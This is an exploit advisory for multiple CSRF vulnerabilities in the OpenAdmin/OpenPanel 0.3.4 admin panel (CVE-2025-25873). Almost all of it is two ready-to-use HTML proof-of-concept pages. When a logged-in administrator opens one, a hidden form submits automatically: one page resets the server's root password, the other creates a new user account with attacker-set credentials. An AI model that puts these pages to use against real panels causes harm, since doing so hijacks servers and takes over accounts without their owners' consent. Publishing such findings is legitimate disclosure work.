# Exploit Title: OpenAdmin 0.3.4 - Multiple CSRF Vulnerabilities
# Date: Nov 8, 2024
# Exploit Author: Punthat Siriwan, Korn Chaisuwan, Manich Koomsusi, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2025-25873

##-- CSRF at Advanced Change Root Password --##
<html>
  <body>
    <form action="https://demo.openpanel.org:2087/server/root-password" method="POST">
      <input type="hidden" name="password" value="P&#64;ssw0rd" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

##-- CSRF at Users --##
<html> 
  <body> 
    <form action="https://demo.openpanel.org:2087/user/new" method="POST" 
enctype="multipart/form-data"> 
      <input type="hidden" name="admin&#95;email" value="csrf&#64;csrf" /> 
      <input type="hidden" name="plan&#95;name" 
value="ubuntu&#95;nginx&#95;mysql" /> 
      <input type="hidden" name="admin&#95;username" value="csrf" /> 
      <input type="hidden" name="admin&#95;password" value="12345678" /> 
      <input type="submit" value="Submit request" /> 
    </form> 
    <script> 
      history.pushState('', '', '/'); 
      document.forms[0].submit(); 
    </script> 
  </body>
</html>